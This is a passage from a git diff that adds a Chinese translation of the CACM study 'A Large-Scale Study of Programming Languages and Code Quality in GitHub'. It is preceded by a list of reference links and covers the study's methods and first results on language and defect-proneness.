-[18]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R13 -[19]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R24 -[20]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 -[21]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 -[22]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 -[23]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 -[24]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R23 -[25]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R14 -[26]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R14 -[27]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FND -[28]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R4 -[29]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R11 -[30]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#FNE -[31]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R7 -[32]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R8 -[33]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R12 -[34]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R20 -[35]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R16 -[36]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R1 -[37]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R19 -[38]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R21 -[39]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#R22 -[40]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#comments -[41]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007# -[42]:https://cacm.acm.org/about-communications/mobile-apps/ -[43]:http://dl.acm.org/citation.cfm?id=3144574.3126905&coll=portal&dl=ACM -[44]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/pdf -[45]:http://dl.acm.org/ft_gateway.cfm?id=3126905&ftid=1909469&dwn=1 -[46]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop -[47]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop -[48]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg -[49]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg -[50]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg -[51]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg -[52]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg -[53]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg -[54]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg -[55]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg -[56]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg -[57]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg -[58]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg -[59]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg -[60]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg -[61]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg -[62]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg -[63]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop -[64]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg -[65]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg -[66]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut1.jpg -[67]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg -[68]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg -[69]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg -[70]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut2.jpg -[71]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg -[72]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg -[73]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg -[74]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut3.jpg -[75]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg -[76]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg -[77]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg -[78]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg -[79]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg -[80]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg -[81]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg -[82]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg -[83]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg -[84]:http://deliveryimages.acm.org/10.1145/3130000/3126905/ut4.jpg -[85]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg -[86]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg -[87]:http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg -[88]:http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg -[89]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop -[90]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop -[91]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop -[92]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop -[93]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop - - diff --git a/translated/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md b/translated/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md new file mode 100644 index 0000000000..25bfcba0bf --- /dev/null +++ b/translated/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md @@ -0,0 +1,414 @@ +在 GitHub 上对编程语言与软件质量的一个大规模研究 +============================================================ + + +![A Large-Scale Study of Programming Languages, illustration](https://cacm.acm.org/system/assets/0002/8759/092117_Getty_Large-Scale-Study1.large.jpg?1506007488&1506007487 "A Large-Scale Study of Programming Languages, illustration") + +编程语言对软件质量的影响是什么?这个问题在很长一段时间内成为一个引起了大量辩论的主题。在这项研究中,我们从 GitHub 上收集了大量的数据(728 个项目,6300 万行源代码,29000 位作者,150 万个提交,17 种编程语言),尝试在这个问题上提供一些实证。这个还算比较大的样本数量允许我们去使用一个混合的方法,结合多种可视化的回归模型和文本分析,去研究语言特性的影响,比如,在软件质量上,静态与动态类型和允许混淆与不允许混淆的类型。通过从不同的方法作三角测量研究(译者注:一种测量研究的方法),并且去控制引起混淆的因素,比如,团队大小、项目大小、和项目历史,我们的报告显示,语言设计确实有很大的影响,但是,在软件质量方面,语言的影响是非常有限的。最明显的似乎是,不允许混淆的类型比允许混淆的类型要稍微好一些,并且,在函数式语言中,静态类型也比动态类型好一些。值得注意的是,这些由语言设计所引起的轻微影响,绝大多数是由过程因素所主导的,比如,项目大小,团队大小,和提交数量。但是,我们警告读者,即便是这些不起眼的轻微影响,也是由其它的无形的过程因素所造成的,例如,对某些函数类型、以及不允许类型混淆的静态语言的偏爱。 + +[Back to Top][46] + +### 1 序言 + +在给定的编程语言是否是“适合这个工作的正确工具”的讨论期间,紧接着又发生了多种辩论。虽然一些辩论出现了带有宗教般狂热的色彩,但是大部分人都一致认为,编程语言的选择能够对编码过程和由此生成的结果都有影响。 + +主张强静态类型的人,倾向于认为静态方法能够在早期捕获到缺陷;他们认为,一点点的预防胜过大量的矫正。动态类型拥护者主张,保守的静态类型检查,无论怎样都是非常浪费开发者资源的,并且,最好是依赖强动态类型检查来捕获错误类型。然而,这些辩论,大多数都是“纸上谈兵”,只靠“传说中”的证据去支持。 + +这些“传说”也许并不是没有道理的;考虑到影响软件工程结果的大量其它因素,获取这种经验性的证据支持是一项极具挑战性的任务,比如,代码质量,语言特征,以及应用领域。比如软件质量,考虑到它有大量的众所周知的影响因素,比如,代码数量,[6][1] 团队大小,[2][2]和年龄/熟练程度[9][3]。 + +受控实验是检验语言选择在面对如此令人气馁的混淆影响时的一种方法,然而,由于成本的原因,这种研究通常会引入一种它们自己的混淆,也就是说,限制了范围。在这种研究中,完整的任务是必须要受限制的,并且不能去模拟 _真实的世界_ 中的开发。这里有几个最近的这种大学本科生使用的研究,或者,通过一个实验因素去比较静态或动态类型的语言。[7][4],[12][5],[15][6] + +幸运的是,现在我们可以基于大量的真实世界中的软件项目去研究这些问题。GitHub 包含了多种语言的大量的项目,并且在大小、年龄、和开发者数量上有很大的差别。每个项目的仓库都提供一个详细的记录,包含贡献历史、项目大小、作者身份、以及缺陷修复。然后,我们使用多种工具去研究语言特性对缺陷发生的影响。对我们的研究方法的最佳描述应该是“混合方法”,或者是三角测量法 [5][7];我们使用文本分析、聚簇、和可视化去证实和支持量化回归研究的结果。这个以经验为根据的方法,帮助我们去了解编程语言对软件质量的具体影响,因为,他们是被开发者非正式使用的。 + +[Back to Top][47] + +### 2 方法 + +我们的方法是软件工程中典型的大范围观察研究法。我们首先大量的使用自动化方法,从几种数据源采集数据。然后使用预构建的统计分析模型对数据进行过滤和清洗。过滤器的选择是由一系列的因素共同驱动的,这些因素包括我们研究的问题的本质、数据质量和认为最适合这项统计分析研究的数据。尤其是,GitHub 包含了由大量的编程语言所写的非常多的项目。对于这项研究,我们花费大量的精力专注于收集那些用大多数的主流编程语言写的流行的项目的数据。我们选择合适的方法来评估计数数据上的影响因素。 + +![*](http://dl.acm.org/images/bullet.gif) + **2.1 数据收集** + +我们选择了 GitHub 上的排名前 19 的编程语言。剔除了 CSS、Shell script、和 Vim script,因为它们不是通用的编程语言。我们包含了 `Typescript`,它是 `JavaScript` 的超集。然后,对每个被研究的编程语言,我们检索出以它为主要编程语言的前 50 个项目。我们总共分析了 17 种不同的语言,共计 850 个项目。 + +我们的编程语言和项目的数据是从 _GitHub Archive_ 中提取的,这是一个记录所有活跃的公共 GitHub 项目的数据库。它记录了 18 种不同的 GitHub 事件,包括新提交(new commits)、fork 事件、PR(pull request)、开发者信息、和以每小时为基础的所有开源 GitHub 项目的问题跟踪(issue tracking)。打包后的数据上传到 Google BigQuery 提供的交互式数据分析接口上。 + +**识别编程语言排名榜单** 我们基于它们的主要编程语言分类合计项目。然后,我们选择大多数的项目进行进一步分析,如 [表 1][48] 所示。一个项目可能使用多种编程语言;将它确定成单一的编程语言是很困难的。Github 包保存的信息是从 GitHub Linguist 上采集的,它使用项目仓库中源文件的扩展名来确定项目的发布语言是什么。源文件中使用数量最多的编程语言被确定为这个项目的 _主要编程语言_。 + + [![t1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t1.jpg)][49] +**表 1 每个编程语言排名前三的项目** + +**检索流行的项目** 对于每个选定的编程语言,我们先根据项目所使用的主要编程语言来选出项目,然后根据每个项目的相关 _星(stars)_ 的数量排出项目的流行度。 _星_ 的数量表示了在这个项目上有多少感兴趣的人在表达自己的意见,并且它是流行度的一个合适的代表指标。因此,在 C 语言中排名前三的项目是 _linux、git、php-src_ ;而对于 C++,它们则是 _node-webkit、phantomjs、mongo_ ;对于 `Java`,它们则是 _storm、elasticsearch、ActionBarSherlock_ 。每个编程语言,我们总共选了 50 个项目。 + +为确保每个项目有足够长的开发历史,我们剔除了少于 28 个提交的项目(28 是每个候选项目的第一个四分位值数)。这样我们还剩下 728 个项目。[表 1][50] 展示了每个编程语言的前三个项目。 + +**检索项目演进历史** 对于 728 个项目中的每一个项目,我们下载了它们的非合并提交、提交记录、作者数据、作者使用的 _git_ 名字。我们从每个文件的添加和删除的行数中计算代码改动和每个提交的修改文件数量。我们以每个提交中修改的文件的扩展名所代表的编程语言,来检索出所使用的编程语言(一个提交可能有多个编程语言标签)。对于每个提交,我们通过它的提交日期减去这个项目的第一个提交的日期,来计算它的 _commit age_ 。我们也计算其它的项目相关的统计数据,包括项目的最大 commit age 和开发者总数,用于我们的回归分析模型的控制变量,它在第三节中会讨论到。我们通过在提交记录中搜索与错误相关的关键字,比如,"error"、"bug"、"fix"、"issue"、"mistake"、"incorrect"、"fault"、"defect"、"flaw",来识别 bug 修复提交。这一点与以前的研究类似。[18][8] + +[表 2][51] 汇总了我们的数据集。因为一个项目可能使用多个编程语言,表的第二列展示了使用某种编程语言的项目的总数量。我们进一步排除了该编程语言的项目中少于 20 个提交的那些编程语言。因为 20 是每个编程语言的每个项目的提交总数的第一个四分位值。例如,我们在 C 语言中共找到 220 项目的提交数量多于 20 个。这确保了每个“编程语言 – 项目”对有足够的活跃度。 + + [![t2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t2.jpg)][52] +**表 2 研究主题** + +总而言之,我们研究了最近 18 年以来,用了 17 种编程语言开发的,总共 728 个项目。总共包括了 29,000 个不同的开发者,157 万个提交,和 564,625 个 bug 修复提交。 + +![*](http://dl.acm.org/images/bullet.gif) + **2.2 语言分类** + +我们基于影响语言质量的几种编程语言特性定义了语言类别,[7][9],[8][10],[12][11],如 [表 3][53] 所示。 _编程范式_ 表示项目是否是以命令方式、脚本方式、或者函数语言所写的。在本文的下面部分,我们分别使用 _命令_ 和 _脚本_ 这两个术语去代表命令方式和脚本方式。 + + [![t3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t3.jpg)][54] +**表 3. 语言分类的不同类型** + + _类型检查_  代表静态或者动态类型。在静态类型语言中,在编译时进行类型检查,并且变量名是绑定到一个值和一个类型的。另外,(包含变量的)表达式是根据运行时,它们可能产生的值所符合的类型来分类的。在动态类型语言中,类型检查发生在运行时。因此,在动态类型语言中,它可能出现在同一个程序中,一个变量名可能会绑定到不同类型的对象上的情形。 + + _隐式类型转换_ 允许一个类型为 T1 的操作数,作为另一个不同的类型 T2 来访问,而无需进行显式的类型转换。这样的隐式类型转换在一些情况下可能会带来类型混淆,尤其是当它表示一个明确的 T1 类型的操作数时,把它再作为另一个不同的 T2 类型的情况下。因为,并不是所有的隐式类型转换都会立即出现问题,通过我们识别出的允许进行隐式类型转换的所有编程语言中,可能发生隐式类型转换混淆的例子来展示我们的定义。例如,在像 `Perl、 JavaScript、CoffeeScript` 这样的编程语言中,一个字符和一个数字相加是允许的(比如,"5" + 2 结果是 "52")。但是在 `Php` 中,相同的操作,结果是 7。像这种操作在一些编程语言中是不允许的,比如 `Java` 和 `Python`,因为,它们不允许隐式转换。在强数据类型的 C 和 C++ 中,这种操作的结果是不可预料的,例如,`int x;float y;y=3.5;x=y`;是合法的 C 代码,并且对于 x 和 y 其结果是不同的值,具体是哪一个值,取决于含义,这可能在后面会产生问题。[a][12] 在 `Objective-C` 中数据类型 _id_ 是一个通用对象指针,它可以被用于任何数据类型的对象,而不管分类是什么。[b][13] 像这种通用数据类型提供了很好的灵活性,它可能导致隐式的类型转换,并且也会出现不可预料的结果。[c][14] 因此,我们根据它的编译器是否 _允许_  或者  _不允许_  如上所述的隐式类型转换,对编程语言进行分类;而不允许隐式类型转换的编程语言,会显式检测类型混淆,并报告类型不匹配的错误。 + +不允许隐式类型转换的编程语言,使用一个类型判断算法,比如,Hindley[10][15] 和 Milner[17][16],或者,在运行时上使用一个动态类型检查器,可以在一个编译器(比如,使用 `Java`)中判断静态类型的结果。相比之下,一个类型混淆可能会悄无声息地发生,因为,它可能因为没有检测到,也可能是没有报告出来。无论是哪种方式,允许隐式类型转换在提供了灵活性的同时,最终也可能会出现很难确定原因的错误。为了简单起见,我们将用 _implicit_ 代表允许隐式类型转换的编程语言,而不允许隐式类型转换的语言,我们用 _explicit_ 代表。 + + _内存分类_  表示是否要求开发者去管理内存。尽管 `Objective-C` 遵循了一个混合模式,我们仍将它在不托管的分类中来对待,因为,我们在它的代码库中观察到很多的内存错误,在第 3 节的 RQ4 中会讨论到。 + +请注意,我们之所以使用这种方式对编程语言来分类和研究,是因为,这种方式在一个“真实的世界”中被大量的开发人员非正式使用。例如,`TypeScript` 被有意地分到静态编程语言的分类中,它不允许隐式类型转换。然而,在实践中,我们注意到,开发者经常(有 50% 可变化,并且跨 `TypeScript` - 在我们的数据集中使用的项目)使用 `any` 类型,一个笼统的联合类型,并且,因此在实践中,`TypeScript` 允许动态地、隐式类型转换。为减少混淆,我们从我们的编程语言分类和相关的模型中排除了 `TypeScript`(查看 [表 3][55] 和 [7][56])。 + +![*](http://dl.acm.org/images/bullet.gif) + **2.3 识别项目领域** + +我们基于编程语言的特性和功能,使用一个自动和手动的混合技术,将研究的项目分类到不同的领域。在 GitHub 上,项目使用 `project descriptions` 和 README 文件来描述它们的特性。我们使用文档主题生成模型(Latent Dirichlet Allocation,缩写为:LDA)[3][17] 去分析这些文本。提供一组文档给它,LDA 将生成不同的关键字,然后来识别可能的主题。对于每个文档,LDA 也估算每个主题分配的文档的概率。 + +我们检测到 30 个不同的领域,换句话说,就是主题,并且评估了每个项目从属于每个领域的概率。因为,这些自动检测的领域包含了几个具体项目的关键字,例如,facebook,很难去界定它的底层的常用功能。为了给每个领域分配一个有意义的名字,我们手动检查了识别到的、独立于项目名字的 30 个领域、领域识别关键字。我们手动重命名了所有的 30 个自动检测的领域,并且找出了以下六个领域的大多数的项目:应用程序、数据库、代码分析、中间件、库、和框架。我们也找出了不符合以上任何一个领域的一些项目,因此,我们把这个领域笼统地标记为 _其它_ 。随后,我们研究组的另一名成员检查和确认了这种项目领域分类的方式。[表 4][57] 汇总了这个过程识别到的领域结果。 + + [![t4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t4.jpg)][58] +**表 4 领域特征** + +![*](http://dl.acm.org/images/bullet.gif) + **2.4 bugs 分类** + +尽管修复软件 bugs 时,开发者经常会在提交日志中留下关于这个 bugs 的原始的重要信息;例如,为什么会产生 bugs,以及怎么去修复 bugs。我们利用很多信息去分类 bugs,与 Tan 的 _et al_ 类似 [13][18],[24][19]。 + +首先,我们基于 bugs 的 _原因_ 和 _影响_ 进行分类。_ 原因 _ 进一步分解为不相关的错误子类:算法方面的、并发方面的、内存方面的、普通编程错误、和未知的。bug 的 _影响_  也分成四个不相关的子类:安全、性能、失败、和其它的未知类。因此,每个 bug 修复提交也包含原因和影响的类型。[表 5][59] 展示了描述的每个 bug 分类。这个类别分别在两个阶段中被执行: + + [![t5.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t5.jpg)][60] +**表 5 bugs 分类和在整个数据集中的描述** + +**(1) 关键字搜索** 我们随机选择了 10% 的 bug 修复信息,并且使用一个关键字基于搜索技术去对它们进行自动化分类,作为可能的 bug 类型。我们对这两种类型(原因和影响),单独使用这个注释。我们选择了一个限定的关键字和习惯用语集,如 [表 5][61] 所展示的。像这种限定的关键字和习惯用语集可以帮我们降低误报。 + +**(2) 监督分类** 我们使用前面步骤中的有注释的 bug 修复日志作为训练数据,为监督学习分类技术,通过测试数据来矫正,去对剩余的 bug 修复信息进行分类。我们首先转换每个 bug 修复信息为一个词袋(译者注:bag-of-words,一种信息检索模型)。然后,删除在所有的 bug 修复信息中仅出现过一次的词。这样减少了具体项目的关键字。我们也使用标准的自然语言处理技术来解决这个问题。最终,我们使用支持向量机(译者注:Support Vector Machine,缩写为 SVM,在机器学习领域中,一种有监督的学习算法)去对测试数据进行分类。 + +为精确评估 bug 分类器,我们手动注释了 180 个随机选择的 bug 修复,平均分布在所有的分类中。然后,我们比较手动注释的数据集在自动分类器中的结果。最终处理后的,表现出的精确度是可接受的,性能方面的精确度最低,是 70%,并发错误方面的精确度最高,是 100%,平均是 84%。再次运行,精确度从低到高是 69% 到 91%,平均精确度还是 84%。 + +我们的 bug 分类的结果展示在 [表 5][62] 中。大多数缺陷的原因都与普通编程错误相关。这个结果并不意外,因为,在这个分类中涉及了大量的编程错误,比如,类型错误、输入错误、编写错误、等等。我们的技术并不能将在任何(原因或影响)分类中占比为 1.4% 的 bug 修复信息再次进行分类;我们将它归类为 Unknown。 + +![*](http://dl.acm.org/images/bullet.gif) + **2.5 统计方法** + +我们使用回归模型对软件项目相关的其它因素中的有缺陷的提交数量进行了建模。所有的模型使用 _负二项回归(译者注:negative binomial regression,缩写为NBR,一种回归分析模型)_ 去对项目属性计数进行建模,比如,提交数量。NBR 是一个广义的线性模型,用于对非负整数进行响应建模。[4][20] + +在我们的模型中,我们对每个项目的编程语言,控制几个可能影响最终结果的因素。因此,在我们的回归分析中,每个(语言、项目)对是一个行,并且可以视为来自流行的开源项目中的样本。我们依据变量计数进行对象转换,以使变量保持稳定,并且提升了模型的适用度。[4][21] 我们通过使用 AIC 和 Vuong 对非嵌套模型的测试比较来验证它们。 + +去检查那些过度的多重共线性(译者注:多重共线性是指,在线性回归模型中解释变量之间由于存在精确相关关系或高度相关关系而使模型估计失真或难以估计准确。)并不是一个问题,我们在所有的模型中使用一个保守的最大值 5,去计算每个依赖的变量的膨胀因子的方差。[4][22] 我们通过对每个模型的残差和杠杆图进行视觉检查来移除高杠杆点,找出库克距离(译者注:一个统计学术语,用于诊断回归分析中是否存在异常数据)的分离值和最大值。 + +我们利用 _效果_ ,或者 _差异_ ,编码到我们的研究中,以提高编程语言回归系数的表现。[4][23] 加权的效果代码允许我们将每种编程语言与所有编程语言的效果进行比较,同时弥补了跨项目使用编程语言的不均匀性。[23][24] 去测试两种变量因素之间的联系,我们使用一个独立的卡方检验(译者注:Chi-square,一种统计学上的假设检验方法)测试。[14][25] 在证实一个依赖之后,我们使用 Cramer 的 V,它是与一个 _r_  ×  _c_ 等价的正常数据的 phi(φ)系数,去建立一个效果数据。 + +[Back to Top][63] + +### 3 结果 + +我们从简单明了的问题开始,它非常直接地解决了人们坚信的一些核心问题,即: + +**RQ1. 一些编程语言相比其它语言来说更易于出现缺陷吗?** + +我们使用了回归分析模型,去比较每个编程语言对所有编程语言缺陷数量平均值的影响,以及对缺陷修复提交的影响(查看 [表 6][64])。 + + [![t6.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t6.jpg)][65] +**表 6. 一些语言的缺陷要少于其它语言** + +我们包括了一些变量,作为对明确影响反应的控制。项目年龄(Project age)也包括在内,因为,越老的项目生成的缺陷修复数量越大。提交数量也会对项目反应有轻微的影响。另外,从事该项目的开发人员的数量和项目的原始大小,都会随着项目的活跃而增长。 + +上述模型中估算系数的大小和符号(译者注:指“+”或者“-”)与结果的预测因子有关。初始的四种变量是控制变量,并且,我们对这些变量对最终结果的影响不感兴趣,只是说它们都是积极的和有意义的。语言变量是指示变量,是每个项目的变化因子,该因子将每种编程语言与所有项目的编程语言的加权平均值进行比较。编程语言系数可以大体上分为三类。第一类是,那些在统计学上无关紧要的系数,并且在建模过程中这些系数不能从 0 中区分出来。这些编程语言的表现与平均值相似,或者它们也可能有更大的方差。剩余的系数是非常明显的,要么是正的,要么是负的。对于那些正的系数,我们猜测可能与这个编程语言有大量的缺陷修复相关。这些语言包括 `C、C++、Objective-C、Php`、以及 `Python`。所有的有一个负的系数的编程语言,比如 `Clojure、Haskell、Ruby`、和 `Scala`,暗示这些语言的缺陷修复提交可能小于平均值。 + +应该注意的是,虽然,从统计学的角度观察到编程语言与缺陷之间有明显的联系,但是,大家不要过高估计编程语言对于缺陷的影响,因为,这种影响效应是非常小的。异常分析的结果显示,这种影响小于总异常的 1%。 + + [![ut1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut1.jpg)][66] + +我们可以这样去理解模型的系数,它代表一个预测因子在所有其它预测因子保持不变的情况下,这个预测因子一个单位(unit)的变化,所反应出的预期的响应的对数变化;换句话说,对于一个系数 _βi_ ,在 _βi_ 中一个单位的变化,产生一个预期的 e _βi_ 响应的变化。对于可变因子,这个预期的变化是与所有编程语言的平均值进行比较。因此,如果对于一定数量的提交,用一个处于平均值的编程语言开发的特定项目有四个缺陷提交,那么,如果选择使用 `C++` 来开发,意味着我们预计应该有一个额外的(译者注:相对于平均值 4,多 1 个)缺陷提交,因为 e0.18 × 4 = 4.79。对于相同的项目,如果选择使用 `Haskell` 来开发,意味着我们预计应该少一个(译者注:同上,相对于平均值 4)缺陷提交。因为, _e_ −0.26 × 4 = 3.08。预测的精确度取决于剩余的其它因子都保持不变,除了那些微不足道的项目之外,所有的这些都是一个极具挑战性的命题。所有观察性研究都面临类似的局限性;我们将在第 5 节中详细解决这些事情。 + +**结论 1:** _一些编程语言相比其它编程语言有更高的缺陷相关度,不过,影响非常小。_ + +在这篇文章的剩余部分,我们在基本结论的基础上详细阐述,通过考虑不同种类的应用程序、缺陷、和编程语言,可以进一步深入了解编程语言和缺陷倾向之间的关系。 + +软件 bugs 通常落进两种宽泛的分类中:(1) _特定领域的 bug_ :特定于项目功能,并且不依赖于底层编程语言。(2) _普通 bug_ :大多数的普通 bug 是天生的,并且与项目功能无关,比如,输入错误,并发错误、等等。 + +因此,在一个项目中,应用程序领域和编程语言相互作用可能会影响缺陷的数量,这一结论被认为是合理的。因为一些编程语言被认为在一些任务上相比其它语言表现更突出,例如,`C` 对于低级别的(底层)工作,或者,`Java` 对于用户应用程序,对于编程语言的一个不合适的选择,可能会带来更多的缺陷。为研究这种情况,我们将理想化地忽略领域特定的 bugs,因为,普通 bugs 更依赖于编程语言的特性。但是,因为一个领域特定的 bugs 也可能出现在一个普通的编程错误中,这两者是很难区分的。一个可能的变通办法是在控制领域的同时去研究编程语言。从统计的角度来看,虽然,使用 17 种编程语言跨 7 个领域,在给定的样本数量中,理解大量的术语将是一个极大的挑战。 + +鉴于这种情况,我们首先考虑在一个项目中测试领域和编程语言使用之间的依赖关系,独立使用一个卡方检验(Chi-square)测试。在 119 个单元中,是 46,也就是说是 39%,它在我们设定的保守值 5 以上,它太高了。这个数字不能超过 20%,应该低于 5。[14][26] 我们在这里包含了完整有值 [d][27];但是,通过 Cramer 的 V 测试的值是 